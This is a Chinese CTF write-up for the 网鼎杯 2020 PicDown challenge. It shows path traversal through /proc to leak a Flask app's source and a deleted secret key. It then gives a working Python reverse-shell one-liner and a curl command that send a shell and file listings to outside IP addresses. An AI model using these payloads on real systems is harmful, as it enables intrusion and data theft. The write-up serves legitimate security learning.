IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> [网鼎杯 2020 白虎组]PicDown --proc文件的利用--python反弹shell -> 正文阅读

[Python知识库][网鼎杯 2020 白虎组]PicDown --proc文件的利用--python反弹shell

文章目录

前言

这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。

wp

首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包
在这里插入图片描述
有个url的GET参数,我们尝试SSRF
url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越

?url=../../etc/passwd

在这里插入图片描述
说明存在文件包含,目录穿越可以实现

我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录

?url=../../proc/self/cmdline

在这里插入图片描述
然后直接爆出app.py的源码

在这里插入图片描述

from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

进行python代码审计
有用的代码


SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

首先知道了/no_one_know_the_manager页面
manager()函数中有个敏感的代码

os.system(shell)

我们可以通过这个shell参数进行命令执行
但是需要key == SECRET_KEY。
我们就需要找到SECRET_KEY
在这里插入图片描述
发现读取/tmp/secret.txt不成功,看到os.remove(SECRET_FILE),说明这个文件已经删除了。
所以我们通过/proc/self/fd/可变数字来获得已经删除的文件内容。
进行爆破
在这里插入图片描述
发现?url=../../proc/self/fd/3是不同,得到

hFp5fd7AAAlgSMgzK7uYKv4yq0BOxauxWmJXwHCaBQY=

这个应该就是密匙了(密匙我重新试了一下不同)。
在这里插入图片描述
但是没有回显ls的东西。
这儿我们就是用python反弹shell

shell=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("101.35.126.83",1515));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

注意我们需要进行urlencode编码。
因为反弹shell的payload中有单引号和双引号,会影响传参。所以使用urlencode。

payload

key=Goqm8uJYz9YzW8b6sO1WxEokWnaXM9TtaBoJIZa6WR4%3D&shell=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2242.193.170.176%22%2C10000))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

注意:
在这里插入图片描述
还可以使用curl反弹shell

?key=YBb%2FolIX5h4ChHDJYy%2BhypD0MtKjJyIs3fI3Jbma1SY%3D&shell=curl 118.***.***.***/`ls /|base64`

因为存在\n,所以我们需要base64加密。
补充:
关于python-c命令:
python -c 可以在命令行中执行 python 代码

python -c "print('TTXT')"

但是引号不要重叠,否则会发生错误,一般使用三引号

python -c '''
import arrow    
print(arrow.now())
'''

可以执行多行代码。

参考

feng师傅的wp
反弹shell]
关于/proc/self的学习

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2021-11-16 18:47:09  更:2021-11-16 18:47:40 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/31 6:24:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码